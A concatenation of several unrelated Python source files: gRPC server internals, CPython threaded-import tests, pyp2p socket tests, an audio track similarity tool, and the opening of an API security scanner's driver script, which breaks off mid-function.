callable_util.call_logging_exceptions(callback,
'Exception calling callback!')
if rpc_state is not None:
with state.lock:
state.rpc_states.remove(rpc_state)
if _stop_serving(state):
should_continue = False
return should_continue
def _serve(state):
while True:
timeout = time.time() + _DEALLOCATED_SERVER_CHECK_PERIOD_S
event = state.completion_queue.poll(timeout)
if state.server_deallocated:
_begin_shutdown_once(state)
if event.completion_type != cygrpc.CompletionType.queue_timeout:
if not _process_event_and_continue(state, event):
return
# We want to force the deletion of the previous event
# ~before~ we poll again; if the event has a reference
# to a shutdown Call object, this can induce spinlock.
event = None
def _begin_shutdown_once(state):
with state.lock:
if state.stage is _ServerStage.STARTED:
state.server.shutdown(state.completion_queue, _SHUTDOWN_TAG)
state.stage = _ServerStage.GRACE
state.shutdown_events = []
state.due.add(_SHUTDOWN_TAG)
def _stop(state, grace):
with state.lock:
if state.stage is _ServerStage.STOPPED:
shutdown_event = threading.Event()
shutdown_event.set()
return shutdown_event
else:
_begin_shutdown_once(state)
shutdown_event = threading.Event()
state.shutdown_events.append(shutdown_event)
if grace is None:
state.server.cancel_all_calls()
else:
def cancel_all_calls_after_grace():
shutdown_event.wait(timeout=grace)
with state.lock:
state.server.cancel_all_calls()
thread = threading.Thread(target=cancel_all_calls_after_grace)
thread.start()
return shutdown_event
shutdown_event.wait()
return shutdown_event
def _start(state):
with state.lock:
if state.stage is not _ServerStage.STOPPED:
raise ValueError('Cannot start already-started server!')
state.server.start()
state.stage = _ServerStage.STARTED
_request_call(state)
thread = threading.Thread(target=_serve, args=(state,))
thread.daemon = True
thread.start()
def _validate_generic_rpc_handlers(generic_rpc_handlers):
for generic_rpc_handler in generic_rpc_handlers:
service_attribute = getattr(generic_rpc_handler, 'service', None)
if service_attribute is None:
raise AttributeError(
'"{}" must conform to grpc.GenericRpcHandler type but does '
'not have "service" method!'.format(generic_rpc_handler))
class _Server(grpc.Server):
# pylint: disable=too-many-arguments
def __init__(self, thread_pool, generic_handlers, interceptors, options,
maximum_concurrent_rpcs):
completion_queue = cygrpc.CompletionQueue()
server = cygrpc.Server(options)
server.register_completion_queue(completion_queue)
self._state = _ServerState(completion_queue, server, generic_handlers,
_interceptor.service_pipeline(interceptors),
thread_pool, maximum_concurrent_rpcs)
def add_generic_rpc_handlers(self, generic_rpc_handlers):
_validate_generic_rpc_handlers(generic_rpc_handlers)
_add_generic_handlers(self._state, generic_rpc_handlers)
def add_insecure_port(self, address):
return _add_insecure_port(self._state, _common.encode(address))
def add_secure_port(self, address, server_credentials):
return _add_secure_port(self._state, _common.encode(address),
server_credentials)
def start(self):
_start(self._state)
def stop(self, grace):
return _stop(self._state, grace)
def __del__(self):
if hasattr(self, '_state'):
# We can not grab a lock in __del__(), so set a flag to signal the
# serving daemon thread (if it exists) to initiate shutdown.
self._state.server_deallocated = True
def create_server(thread_pool, generic_rpc_handlers, interceptors, options,
maximum_concurrent_rpcs):
_validate_generic_rpc_handlers(generic_rpc_handlers)
return _Server(thread_pool, generic_rpc_handlers, interceptors, options,
maximum_concurrent_rpcs)
|
test_threaded_import.py | # This is a variant of the very old (early 90's) file
# Demo/threads/bug.py. It simply provokes a number of threads into
# trying to import the same module "at the same time".
# There are no pleasant failure modes -- most likely is that Python
# complains several times about module random having no attribute
# randrange, and then Python hangs.
import _imp as imp
import os
import importlib
import sys
import time
import shutil
import unittest
from test.support import (
verbose, import_module, run_unittest, TESTFN, reap_threads,
forget, unlink, rmtree)
threading = import_module('threading')
def task(N, done, done_tasks, errors):
try:
# We don't use modulefinder but still import it in order to stress
# importing of different modules from several threads.
if len(done_tasks) % 2:
import modulefinder
import random
else:
import random
import modulefinder
# This will fail if random is not completely initialized
x = random.randrange(1, 3)
except Exception as e:
errors.append(e.with_traceback(None))
finally:
done_tasks.append(threading.get_ident())
finished = len(done_tasks) == N
if finished:
done.set()
# Create a circular import structure: A -> C -> B -> D -> A
# NOTE: `time` is already loaded and therefore doesn't threaten to deadlock.
circular_imports_modules = {
'A': """if 1:
import time
time.sleep(%(delay)s)
x = 'a'
import C
""",
'B': """if 1:
import time
time.sleep(%(delay)s)
x = 'b'
import D
""",
'C': """import B""",
'D': """import A""",
}
class Finder:
"""A dummy finder to detect concurrent access to its find_spec()
method."""
def __init__(self):
self.numcalls = 0
self.x = 0
self.lock = threading.Lock()
def find_spec(self, name, path=None, target=None):
# Simulate some thread-unsafe behaviour. If calls to find_spec()
# are properly serialized, `x` will end up the same as `numcalls`.
# Otherwise not.
assert imp.lock_held()
with self.lock:
self.numcalls += 1
x = self.x
time.sleep(0.01)
self.x = x + 1
class FlushingFinder:
"""A dummy finder which flushes sys.path_importer_cache when it gets
called."""
def find_spec(self, name, path=None, target=None):
sys.path_importer_cache.clear()
class ThreadedImportTests(unittest.TestCase):
def setUp(self):
self.old_random = sys.modules.pop('random', None)
def tearDown(self):
# If the `random` module was already initialized, we restore the
# old module at the end so that pickling tests don't fail.
# See http://bugs.python.org/issue3657#msg110461
if self.old_random is not None:
sys.modules['random'] = self.old_random
def check_parallel_module_init(self):
if imp.lock_held():
# This triggers on, e.g., from test import autotest.
raise unittest.SkipTest("can't run when import lock is held")
done = threading.Event()
for N in (20, 50) * 3:
if verbose:
print("Trying", N, "threads ...", end=' ')
# Make sure that random and modulefinder get reimported freshly
for modname in ['random', 'modulefinder']:
try:
del sys.modules[modname]
except KeyError:
pass
errors = []
done_tasks = []
done.clear()
for i in range(N):
t = threading.Thread(target=task,
args=(N, done, done_tasks, errors,))
t.start()
self.assertTrue(done.wait(60))
self.assertFalse(errors)
if verbose:
print("OK.")
def test_parallel_module_init(self):
self.check_parallel_module_init()
def test_parallel_meta_path(self):
finder = Finder()
sys.meta_path.insert(0, finder)
try:
self.check_parallel_module_init()
self.assertGreater(finder.numcalls, 0)
self.assertEqual(finder.x, finder.numcalls)
finally:
sys.meta_path.remove(finder)
def test_parallel_path_hooks(self):
# Here the Finder instance is only used to check concurrent calls
# to path_hook().
finder = Finder()
# In order for our path hook to be called at each import, we need
# to flush the path_importer_cache, which we do by registering a
# dedicated meta_path entry.
flushing_finder = FlushingFinder()
def path_hook(path):
finder.find_spec('')
raise ImportError
sys.path_hooks.insert(0, path_hook)
sys.meta_path.append(flushing_finder)
try:
# Flush the cache a first time
flushing_finder.find_spec('')
numtests = self.check_parallel_module_init()
self.assertGreater(finder.numcalls, 0)
self.assertEqual(finder.x, finder.numcalls)
finally:
sys.meta_path.remove(flushing_finder)
sys.path_hooks.remove(path_hook)
def test_import_hangers(self):
# In case this test is run again, make sure the helper module
# gets loaded from scratch again.
try:
del sys.modules['test.threaded_import_hangers']
except KeyError:
pass
import test.threaded_import_hangers
self.assertFalse(test.threaded_import_hangers.errors)
def test_circular_imports(self):
# The goal of this test is to exercise implementations of the import
# lock which use a per-module lock, rather than a global lock.
# In these implementations, there is a possible deadlock with
# circular imports, for example:
# - thread 1 imports A (grabbing the lock for A) which imports B
# - thread 2 imports B (grabbing the lock for B) which imports A
# Such implementations should be able to detect such situations and
# resolve them one way or the other, without freezing.
# NOTE: our test constructs a slightly less trivial import cycle,
# in order to better stress the deadlock avoidance mechanism.
delay = 0.5
os.mkdir(TESTFN)
self.addCleanup(shutil.rmtree, TESTFN)
sys.path.insert(0, TESTFN)
self.addCleanup(sys.path.remove, TESTFN)
for name, contents in circular_imports_modules.items():
contents = contents % {'delay': delay}
with open(os.path.join(TESTFN, name + ".py"), "wb") as f:
f.write(contents.encode('utf-8'))
self.addCleanup(forget, name)
importlib.invalidate_caches()
results = []
def import_ab():
import A
results.append(getattr(A, 'x', None))
def import_ba():
import B
results.append(getattr(B, 'x', None))
t1 = threading.Thread(target=import_ab)
t2 = threading.Thread(target=import_ba)
t1.start()
t2.start()
t1.join()
t2.join()
self.assertEqual(set(results), {'a', 'b'})
def test_side_effect_import(self):
code = """if 1:
import threading
def target():
import random
t = threading.Thread(target=target)
t.start()
t.join()"""
sys.path.insert(0, os.curdir)
self.addCleanup(sys.path.remove, os.curdir)
filename = TESTFN + ".py"
with open(filename, "wb") as f:
f.write(code.encode('utf-8'))
self.addCleanup(unlink, filename)
self.addCleanup(forget, TESTFN)
self.addCleanup(rmtree, '__pycache__')
importlib.invalidate_caches()
__import__(TESTFN)
@reap_threads
def test_main():
old_switchinterval = None
try:
old_switchinterval = sys.getswitchinterval()
sys.setswitchinterval(1e-5)
except AttributeError:
pass
try:
run_unittest(ThreadedImportTests)
finally:
if old_switchinterval is not None:
sys.setswitchinterval(old_switchinterval)
if __name__ == "__main__":
test_main()
|
test_sock.py | """
* Test whether multiple recvs on the same connection (non-blocking) will
eventually have the connection closed (use another net instance.)
* Test whether multiple sends on the same connection (non-blocking) will
eventually lead to the connection being closed (use a net instance with
no recvs! and loop over the cons)
(Not implemented for now since these will greatly slow the build.)
"""
import hashlib
import os
import tempfile
from threading import Thread
from unittest import TestCase
from pyp2p.net import rendezvous_servers
from pyp2p.rendezvous_client import RendezvousClient
from pyp2p.sock import *
if sys.version_info >= (3, 0, 0):
from urllib.parse import urlparse
import socketserver as SocketServer
from http.server import HTTPServer
from http.server import SimpleHTTPRequestHandler
else:
from urlparse import urlparse
import SocketServer
from BaseHTTPServer import HTTPServer
from SimpleHTTPServer import SimpleHTTPRequestHandler
class ThreadingSimpleServer(
SocketServer.ThreadingMixIn,
HTTPServer
):
pass
def md5sum(fname):
my_hash = hashlib.md5()
with open(fname, "rb") as f:
for chunk in iter(lambda: f.read(4096), b""):
my_hash.update(chunk)
return my_hash.hexdigest()
class SockDownload:
def __init__(self, url, expected_hash, file_size, blocking=0,
encoding="ascii"):
"""
Download a file from a HTTP URL and compare it to an MD5 hash.
Uses the sock.py module for testing.
:param url: URL to download
:param expected_hash: MD5 hash of file (md5sum file from term)
:param file_size: size in bytes of the file to download
:param blocking: use blocking or non-blocking sockets
:return:
"""
url = urlparse(url)
location = url.netloc.split(":")
if len(location) == 1:
port = 80
host, = location
else:
host, port = location
con = Sock(host, port, blocking=blocking, debug=1)
req = self.build_request(host, url.path)
con.send(req, send_all=1)
buf = u""
eof = u"\r\n\r\n"
while buf != eof and con.connected:
ch = con.recv(1)
if len(ch):
buf += ch
eq = 0
for i in range(0, len(buf)):
if buf[i] != eof[eq]:
eq = 0
else:
eq += 1
# Reset buf.
if eq == len(eof):
break
fp, path = tempfile.mkstemp()
os.close(fp)
remaining = file_size
with open(path, "ab") as fp:
future = time.time() + 30 # Slow connections are slow.
while con.connected and remaining:
data = con.recv(remaining, encoding=encoding)
print(type(data))
if len(data):
remaining -= len(data)
fp.write(data)
time.sleep(0.0002)
# Fail safe:
if time.time() >= future:
break
found_hash = md5sum(path)
os.remove(path)
if expected_hash is not None:
assert(found_hash == expected_hash)
def build_request(self, host, resource):
req = "GET %s HTTP/1.1\r\n" % resource
req += "Host: %s\r\n\r\n" % host
return req
class SockUpload:
def __init__(self, upload_size, blocking=0):
host = u"185.86.149.128"
port = 80
resource = u"/upload_test.php"
content = self.build_content(upload_size)
con = Sock(host, port, blocking=blocking, debug=1)
req = self.build_request(host, resource, content)
con.send(req, send_all=1, timeout=6)
# Now do the actual upload.
remaining = upload_size
chunk_size = 4096
while con.connected and remaining:
sent = upload_size - remaining
msg = content[sent:sent + chunk_size]
sent = con.send(msg)
if sent:
remaining -= sent
# Get response.
con.set_blocking(1)
ret = con.recv(1024)
# Check response.
expected_hash = hashlib.sha256(content).hexdigest()
assert(expected_hash in ret)
def build_request(self, host, resource, content):
req = "POST %s HTTP/1.1\r\n" % resource
req += "Host: %s\r\n" % host
req += "User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:42.0) "
req += "Gecko/20100101 Firefox/42.0\r\n"
req += "Accept: text/html,"
req += "application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
req += "Accept-Language: en-US,en;q=0.5\r\n"
req += "Accept-Encoding: gzip, deflate\r\n"
req += "Connection: keep-alive\r\n"
req += "Content-Type: application/x-www-form-urlencoded\r\n"
req += "Content-Length: %d\r\n\r\n" % (len(content) + 5)
req += "test=" # Hence the extra + 5.
return req
def build_content(self, upload_size):
content = b"8" * upload_size
return content
def simple_server():
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind(('localhost', 9000))
s.listen(0)
(clientsocket, address) = s.accept()
time.sleep(2)
s.close()
class TestSock(TestCase):
def test_http_upload_post(self):
SockUpload(1000 * 100)
def test_http_download(self):
SockDownload(
"http://mirror.internode.on.net/pub/test/1meg.test",
"e6527b4d5db05226f40f9f2e7750abfb",
1000000
)
def test_blocking_mode(self):
x = Sock()
blocking = x.s.gettimeout()
if x.blocking:
assert(blocking >= 1 or blocking is None)
else:
assert(blocking == 0.0)
x.close()
x = Sock(blocking=1)
blocking = x.s.gettimeout()
if x.blocking:
assert(blocking >= 1 or blocking is None)
else:
assert(blocking == 0.0)
x.close()
x = Sock("www.example.com", 80, timeout=10)
blocking = x.s.gettimeout()
if x.blocking:
assert(blocking >= 1 or blocking is None)
else:
assert(blocking == 0.0)
x.close()
x = Sock("www.example.com", 80, blocking=1, timeout=10)
blocking = x.s.gettimeout()
if x.blocking:
assert(blocking >= 1 or blocking is None)
else:
assert(blocking == 0.0)
x.close()
def test_blocking_timeout(self):
client = RendezvousClient(nat_type="preserving",
rendezvous_servers=rendezvous_servers)
s = client.server_connect()
t = time.time()
s.recv_line(timeout=1)
if time.time() - t >= 4:
print("Manual timeout failed.")
assert 0
s.close()
def test_non_blocking_timeout(self):
client = RendezvousClient(nat_type="preserving",
rendezvous_servers=rendezvous_servers)
s = client.server_connect()
assert(s.recv_line() == u"")
assert(s.recv(1) == u"")
s.close()
def test_encoding(self):
client = RendezvousClient(nat_type="preserving",
rendezvous_servers=rendezvous_servers)
s = client.server_connect()
s.send_line("SOURCE TCP 50")
ret = s.recv(1, encoding="ascii")
if sys.version_info >= (3, 0, 0):
assert(type(ret) == bytes)
else:
assert(type(ret) == str)
assert(ret == b"R")
ret = s.recv_line()
assert(u"EMOTE" in ret)
s.send_line("SOURCE TCP 50")
ret = s.recv(1, encoding="unicode")
if sys.version_info >= (3, 0, 0):
assert(type(ret) == str)
else:
assert(type(ret) == unicode)
s.close()
def test_0000001_sock(self):
client = RendezvousClient(nat_type="preserving",
rendezvous_servers=rendezvous_servers)
s = client.server_connect()
assert s.connected
s.send_line("SOURCE TCP 323")
assert s.connected
line = s.recv_line()
assert ("REMOTE" in line)
s = Sock("www.example.com", 80, blocking=0, timeout=10)
data = "GET / HTTP/1.1\r\n"
data += "Connection: close\r\n"
data += "Host: www.example.com\r\n\r\n"
s.send(data, send_all=1)
replies = ""
while s.connected:
for reply in s:
# Output should be unicode.
if sys.version_info >= (3, 0, 0):
assert (type(reply) == str)
else:
assert (type(reply) == unicode)
replies += reply
print(reply)
assert (s.connected != 1)
assert (replies != "")
s.close()
s.reconnect()
s.close()
s = Sock("www.example.com", 80, blocking=1, timeout=10)
s.send_line("GET / HTTP/1.1")
s.send_line("Host: www.example.com\r\n")
line = s.recv_line()
print(line)
print(type(line))
print(s.buf)
print(type(s.buf))
assert (line, "HTTP/1.1 200 OK")
if sys.version_info >= (3, 0, 0):
assert (type(line) == str)
else:
assert (type(line) == unicode)
s.close()
s = Sock()
s.buf = b"\r\nx\r\n"
x = s.parse_buf()
assert (x[0] == "x")
s.buf = b"\r\n"
x = s.parse_buf()
assert (x == [])
s.buf = b"\r\n\r\n"
x = s.parse_buf()
assert (x == [])
s.buf = b"\r\r\n\r\n"
x = s.parse_buf()
assert (x[0] == "\r")
s.buf = b"\r\n\r\n\r\nx"
x = s.parse_buf()
assert (x == [])
s.buf = b"\r\n\r\nx\r\nsdfsdfsdf\r\n"
x = s.parse_buf()
assert (x[0] == "x" and x[1] == "sdfsdfsdf")
s.buf = b"sdfsdfsdf\r\n"
s.parse_buf()
s.buf += b"abc\r\n"
x = s.parse_buf()
assert (x[0] == "abc")
s.buf += b"\r\ns\r\n"
x = s.parse_buf()
assert (x[0] == "s")
s.buf = b"reply 1\r\nreply 2\r\n"
s.replies = []
s.update()
assert (s.pop_reply(), "reply 1")
assert (s.replies[0], "reply 2")
def test_keep_alive(self):
old_system = platform.system
for os in ["Darwin", "Windows", "Linux"]:
def system_wrapper():
return os
platform.system = system_wrapper
sock = Sock()
# Sock option error - not supported on this OS.
try:
sock.set_keep_alive(sock.s)
except socket.error as e:
valid_errors = (10042, 22)
if e.errno not in valid_errors:
raise e
except AttributeError:
pass
sock.close()
platform.system = old_system
assert 1
def test_non_default_iface(self):
sock = Sock(interface="eth12")
try:
sock.connect("www.example.com", 80, timeout=10)
except (TypeError, socket.error) as e:
pass
sock.close()
assert 1
def test_ssl(self):
s = Sock(
"www.example.com",
443,
blocking=0,
timeout=10,
use_ssl=1
)
data = "GET / HTTP/1.1\r\n"
data += "Connection: close\r\n"
data += "Host: www.example.com\r\n\r\n"
s.send(data, send_all=1)
replies = ""
while s.connected:
for reply in s:
# Output should be unicode.
if sys.version_info >= (3, 0, 0):
assert (type(reply) == str)
else:
assert (type(reply) == unicode)
replies += reply
print(reply)
assert (s.connected != 1)
assert (replies != "")
def test_ssl_blocking_error(self):
# Blocking.
s = Sock(
"www.example.com",
443,
blocking=1,
timeout=2,
use_ssl=1,
debug=1
)
s.get_chunks()
s.close()
# Non-blocking.
s = Sock(
"www.example.com",
443,
blocking=0,
timeout=2,
use_ssl=1,
debug=1
)
s.get_chunks()
s.close()
def test_decoding_error(self):
SockDownload(
"http://mirror.internode.on.net/pub/test/1meg.test",
expected_hash=None,
file_size=1000,
blocking=0,
encoding="unicode"
)
def test_broken_send_con(self):
# Can't monkey patch socket on Linux.
if platform.system != "Windows":
return
port = 10121
server = ThreadingSimpleServer(('', port), SimpleHTTPRequestHandler)
sock = Sock("127.0.0.1", port, debug=1, timeout=6)
server.server_close()
print(sock.send(b"test"))
sock.close()
server = ThreadingSimpleServer(('', port), SimpleHTTPRequestHandler)
def close_server():
time.sleep(1)
server.server_close()
sock = Sock("127.0.0.1", port, debug=1, timeout=6)
Thread(target=close_server).start()
for i in range(0, 5):
print(sock.send(b"test"))
time.sleep(0.5)
sock.close
# Simulate send timeout!
sock = Sock(debug=1, blocking=1)
def raise_timeout():
time.sleep(1)
original_send = sock.s.send
def fake_send(data):
raise socket.timeout("timed out")
sock.s.send = fake_send
time.sleep(1)
sock.s.send = original_send
Thread(target=raise_timeout).start()
sock.connect("www.example.com", 80)
# You want to fill up the entire networking buffer
# so that it times out without the needed recv.
buf_size = sock.s.getsockopt(socket.SOL_SOCKET, socket.SO_SNDBUF) + 1
buf_size *= 2
sock.chunk_size = buf_size
total = 0
for i in range(0, 4):
x = sock.send(b"x" * buf_size)
total += x
if x < buf_size:
break
time.sleep(2.2)
sock.close()
# Test broken connection.
sock = Sock(debug=1, blocking=1)
def raise_timeout():
time.sleep(1)
original_send = sock.s.send
def fake_send(data):
return 0
sock.s.send = fake_send
time.sleep(1)
Thread(target=raise_timeout).start()
sock.connect("www.example.com", 80)
# You want to fill up the entire networking buffer
# so that it times out without the needed recv.
x = 1
timeout = time.time() + 10
while x and time.time() < timeout:
x = sock.send(b"x")
time.sleep(2.2)
sock.close()
def test_magic(self):
sock = Sock()
sock.replies = ["a", "b", "c"]
assert(len(sock) == 3)
assert(sock[0] == "a")
del sock[0]
assert(sock[0] == "b")
sock[0] = "x"
assert(sock[0] == "x")
y = list(reversed(sock))
assert(y == ["x", "c"])
|
main.py | import os
import time
import sys
from itertools import chain
from core.db import Db
from core.util import sha256sum, scale, progress, sum_n
from core.thread import StartThread
from core.extractor import get_all_features, get_distance
class Main:
def __init__(self, db_name):
"""
Constructor for Main class
Attributes
----------
audio_path: location of audio files
db: database class object
"""
# Go through README.md to see which database to use
_database_name = db_name
_audio_folder_name = 'audio_resources'
_root_dir_path = os.path.abspath(os.path.join(os.path.dirname(__file__), '../'))
_db_file = os.path.join(_root_dir_path, _database_name)
self.audio_path = os.path.join(_root_dir_path, _audio_folder_name)
self.db = Db(storage_file=_db_file)
def calc_feature_new(self):
"""
Loop through the audio_resources folder and calculate features of each track and the distance between them
and then save the distance to the database
"""
start_time = time.time()
if not self.db.create_tables():
print('Problem in creating tables')
return
file_list, file_list_size = self._get_files_from_folder()
# if there is no file in audio_resources, no point in going forward
if file_list_size == 0:
return
print('Checking if already present in db...')
val = self.db.get_all_names()
if len(val) == 0:
print('Database is empty')
to_be_processed = file_list
else:
# check if file is already processed in database
to_be_processed = self._not_present_in_db(file_list=file_list)
# if all files are already processed, then exit this and show similarities
if len(to_be_processed) == 0:
return
print()
# calculate the features of all the files
features = self._calculate_features(files=to_be_processed)
print()
# calculate the distances between all the features
dist = self._calulate_distances(features=features)
print()
# save the distances in the distance table
self._save_dist_to_db_new(distances=dist)
print()
finish_time = time.time() - start_time
if finish_time > 120:
print('Done! Took %.2f minutes to complete' % (finish_time / 60))
else:
print('Done! Took %.2f seconds to complete' % finish_time)
def calc_feature(self):
"""
Loop through the audio_resources folder and calculate features of each track and the distance between them
and then save the distance to the database
"""
start_time = time.time()
if not self.db.create_tables():
print('Problems in creating tables')
return
# loop over the directory
file_list, file_list_size = self._get_files_from_folder()
processed_file_list = []
processing = False
total_prog = sum_n(file_list_size + 1)
curr_prog = 0
print('Processing...')
# start progress bar in console
progress(curr_prog)
i = 0
while i < file_list_size:
ifile = file_list[i]
# get audios
if ifile not in processed_file_list:
ipath = os.path.join(self.audio_path, ifile)
update_ifile = True
processed_file_list.append(ifile)
ifile_sha = sha256sum(ipath)
j = i + 1
while j < file_list_size:
jfile = file_list[j]
jpath = os.path.join(self.audio_path, jfile)
jfile_sha = sha256sum(jpath)
# check if their hash is already present in the distance table
if self.db.is_hashes_present(ifile_sha, jfile_sha):
j += 1
continue
else:
# if not, calculate features and distances and save to db
if update_ifile:
ithread = StartThread(target=get_all_features, args=(ipath,))
ithread.start()
# ifeature = ex.get_all_features(os.path.join(audio_path, ifile))
jthread = StartThread(target=get_all_features, args=(jpath,))
jthread.start()
if update_ifile:
ifeature = ithread.join()
update_ifile = False
curr_prog += 1
progress(scale(0, total_prog, curr_prog))
jfeature = jthread.join()
# jfeature = ex.get_all_features(os.path.join(audio_path, jfile))
# dist = ex.get_distance(ifeature, jfeature)
# db.save_feature_distances(dist)
if processing: # distances can be calculated until the next features are calculated
dist_thread.join()
dist_thread = StartThread(target=self._save_dist_to_db, args=(ifeature, jfeature,))
dist_thread.start()
curr_prog += 1
progress(scale(0, total_prog, curr_prog))
processing = True
j += 1
i += 1
if processing:
dist_thread.join()
message = 'Done! Took %.0f seconds to calculate features and distances between ' % (
time.time() - start_time) + str(file_list_size) + ' files'
else:
message = 'Data collected from database'
progress(1)
print()
print(message)
def show_similarity(self):
"""
Gets the data from database and shows the similarity between the tracks
"""
names = self._get_names_from_db()
factors = self.db.get_all_distances()
if factors == None:
print('Audio_resources folder and the database is empty!')
return
if len(factors) == 0:
print('Nothing to show')
return
names.sort()
sum_list = []
for fact in factors:
sum_list.append(fact[2] + fact[3] + fact[4] + fact[5] + fact[6] + fact[7])
min_val = min(sum_list)
max_val = max(sum_list)
while True:
print()
# Printing name of files from the database
for i, name in enumerate(names):
print(' %-30s ' % (str(i + 1) + '. ' + name), end='')
if (i + 1) % 3 == 0:
print()
print()
# Getting a file number
try:
val = int(input('Select a track number(0 to exit)...'))
except ValueError as e:
print('Enter a valid number, Press enter to continue')
input()
continue
if val == 0:
break
elif val > len(names):
print('Enter a valid number, Press enter to continue')
input()
continue
print()
selected_track = names[val - 1]
print('Top 10 tracks closest to:', selected_track, ' are:')
# print('Similarity measure with ', selected_track)
result = []
for index, factor in enumerate(factors):
scaled_sum = scale(rmin=min_val, rmax=max_val, val=sum_list[index])
if factor[0] == selected_track:
result.append((factor[1], 100 * (1 - scaled_sum)))
elif factor[1] == selected_track:
result.append((factor[0], 100 * (1 - scaled_sum)))
# Sorting the list according to maximum distance
result.sort(key=lambda tup: tup[1], reverse=True)
for ind, val in enumerate(result):
# Printing top 10 results
if ind is 10:
break
print('%2d. %-30s - %.1f %%' % (ind+1, val[0], val[1]))
print('-------------------------------------------------')
x = input('Press Enter to continue or 0 to exit...')
if x == '0':
break
print()
# method used in older calc_feature
def _save_dist_to_db(self, ifeature, jfeature):
dist = get_distance(ifeature, jfeature)
self.db.save_feature_distances(dist)
def _get_names_from_db(self):
names_db = self.db.get_all_names()
tup_to_list = list(chain.from_iterable(names_db))
names = list(set(tup_to_list))
return names
def _get_files_from_folder(self):
file_list = []
for file in os.listdir(self.audio_path):
if file.endswith('.mp3') or file.endswith('.wav'):
file_list.append(file)
return file_list, len(file_list)
def _not_present_in_db(self, file_list):
"""
Checks if files present in audio_resources is already not processed in database
:param file_list: list of files in audio_resources folder
:return to_be_processed: list of files which are in audio_resources and not yet processed
"""
to_be_processed = []
size = len(file_list)
total_prog = sum_n(size + 1)
curr_prog = 0
progress(0)
for i, ifile in enumerate(file_list):
ifile_sha = sha256sum(os.path.join(self.audio_path, ifile))
j = i + 1
while j < size:
jfile = file_list[j]
jfile_sha = sha256sum(os.path.join(self.audio_path, jfile))
if ifile not in to_be_processed and not self.db.is_hashes_present(ifile_sha, jfile_sha):
to_be_processed.append(ifile)
curr_prog += 1
progress(scale(0, total_prog, curr_prog))
j += 1
progress(1)
return to_be_processed
def _calculate_features(self, files):
print('Calculating features...')
features = []
total_prog = len(files)
curr_prog = 0
for file in files:
progress(percent=scale(0, total_prog, curr_prog), name=file)
features.append(get_all_features(os.path.join(self.audio_path, file)))
curr_prog += 1
progress(1)
return features
def _calulate_distances(self, features):
print('Calculating distances...')
dist = []
size = len(features)
total_prog = sum_n(size)
curr_prog = 0
for i, ifeature in enumerate(features):
j = i + 1
while j < size:
jfeature = features[j]
progress(percent=scale(0, total_prog, curr_prog), name=ifeature.name + ' <==> ' + jfeature.name)
dist.append(get_distance(ifeature, jfeature))
curr_prog += 1
j += 1
progress(1)
return dist
def _save_dist_to_db_new(self, distances):
print('Saving to DB...')
total_prog = len(distances)
curr_prog = 0
progress(curr_prog)
for dist in distances:
if self.db.is_hashes_present(dist.hash1, dist.hash2):
continue
self.db.save_feature_distances(dist)
curr_prog += 1
progress(scale(0, total_prog, curr_prog))
progress(1)
|
astra.py | import argparse
import base64
import json
import requests
import time
import ast
import utils.logger as logger
import utils.logs as logs
import urlparse
from core.zapscan import *
from core.parsers import *
from utils.logger import *
from core.login import APILogin
from utils.logger import logger
from utils.config import update_value,get_value,get_allvalues
from modules.cors import cors_main
from modules.auth import auth_check
from modules.rate_limit import rate_limit
from modules.csrf import csrf_check
from modules.jwt_attack import jwt_check
from modules.sqli import sqli_check
from modules.xss import xss_check
from modules.redirect import open_redirect_check
from core.zap_config import zap_start
from multiprocessing import Process
from utils.db import Database_update
dbupdate = Database_update()
def parse_collection(collection_name,collection_type):
if collection_type == 'Postman':
parse_data.postman_parser(collection_name)
else:
print "[-]Failed to Parse collection"
sys.exit(1)
def add_headers(headers):
# This function deals with adding custom header and auth value .
cookie = get_value('config.property','login','auth')
cookie_dict = ast.literal_eval(cookie)
cookie_header = {'Cookie': cookie_dict['cookie']}
headers.update(cookie_header)
try:
custom_header = get_value('config.property','login','headers')
custom_header = ast.literal_eval(custom_header)
headers.update(custom_header)
except:
pass
return headers
def generate_report():
# Generating report once the scan is complete.
result = api_scan.generate_report()
if result is True:
print "%s[+]Report is generated successfully%s"% (api_logger.G, api_logger.W)
else:
print "%s[-]Failed to generate a report%s"% (api_logger.R, api_logger.W)
def read_scan_policy():
try:
scan_policy = get_value('scan.property','scan-policy','attack')
attack = ast.literal_eval(scan_policy)
except Exception as e:
print e
print "Failed to parse scan property file."
return attack
def update_scan_status(scanid, module_name=None, count=None):
#Update scanning status and total scan of module into DB.
time.sleep(3)
if count is not None:
dbupdate.update_scan_record({"scanid": scanid}, {"$set" : {"total_scan" : count}})
else:
dbupdate.update_scan_record({"scanid": scanid}, {"$set" : {module_name : "Y"}})
def modules_scan(url,method,headers,body,scanid=None):
'''Scanning API using different engines '''
attack = read_scan_policy()
if attack is None:
print "Failed to start scan."
sys.exit(1)
if scanid is not None:
count = 0
for key,value in attack.items():
if value == 'Y' or value =='y':
count += 1
update_scan_status(scanid,"",count)
if attack['zap'] == "Y" or attack['zap'] == "y":
api_scan = zap_scan()
status = zap_start()
if status is True:
api_scan.start_scan(url,method,headers,body,scanid)
# Custom modules scan
if attack['cors'] == 'Y' or attack['cors'] == 'y':
cors_main(url,method,headers,body,scanid)
update_scan_status(scanid, "cors")
if attack['Broken auth'] == 'Y' or attack['Broken auth'] == 'y':
auth_check(url,method,headers,body,scanid)
update_scan_status(scanid, "auth")
if attack['Rate limit'] == 'Y' or attack['Rate limit'] == 'y':
rate_limit(url,method,headers,body,scanid)
update_scan_status(scanid, "Rate limit")
if attack['csrf'] == 'Y' or attack['csrf'] == 'y':
csrf_check(url,method,headers,body,scanid)
update_scan_status(scanid, "csrf")
if attack['jwt'] == 'Y' or attack['jwt'] == 'y':
jwt_check(url,method,headers,body,scanid)
update_scan_status(scanid, "jwt")
if attack['sqli'] == 'Y' or attack['sqli'] == 'y':
sqli_check(url,method,headers,body,scanid)
update_scan_status(scanid, "sqli")
if attack['xss'] == 'Y' or attack['xss'] == 'y':
xss_check(url,method,headers,body,scanid)
update_scan_status(scanid, "xss")
if attack['open-redirection'] == 'Y' or attack['open-redirection'] == 'y':
open_redirect_check(url,method,headers,body,scanid)
update_scan_status(scanid, "open-redirection")
def validate_data(url,method):
''' Validate HTTP request data and return boolean value'''
validate_url = urlparse.urlparse(url)
http_method = ['GET','POST','DEL','OPTIONS','PUT']
if method in http_method and bool(validate_url.scheme) is True:
validate_result = True
else:
validate_result = False
return validate_result
def scan_single_api(url, method, headers, body, api, scanid=None):
